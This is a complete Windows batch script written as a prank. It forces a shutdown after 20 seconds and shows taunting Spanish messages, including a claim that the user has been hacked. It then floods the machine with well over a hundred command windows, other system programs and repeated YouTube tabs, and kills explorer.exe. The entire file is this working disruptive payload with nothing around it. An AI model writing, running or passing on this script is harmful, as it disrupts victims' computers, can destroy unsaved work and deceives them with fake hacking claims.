@echo off
shutdown.exe -s -t 20 -c "tu computadora esta apunto de reventar"
msg * sobrevive xd mientras puedas
msg * xd
:repeat
START cmd
START cmd
START cmd
START calc
START control
echo te hackearon por nuv
START explorer
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START cmd
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=fiYJD97NrAw
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=xJxr1piIfSU
START https://www.youtube.com/watch?v=PV8r9ILIJOE
START https://www.youtube.com/watch?v=PV8r9ILIJOE
START https://www.youtube.com/watch?v=PV8r9ILIJOE
START https://www.youtube.com/watch?v=PV8r9ILIJOE
START https://www.youtube.com/watch?v=PV8r9ILIJOE
START https://www.youtube.com/watch?v=PV8r9ILIJOE
taskkill /f /im explorer.exe
exit
goto repeat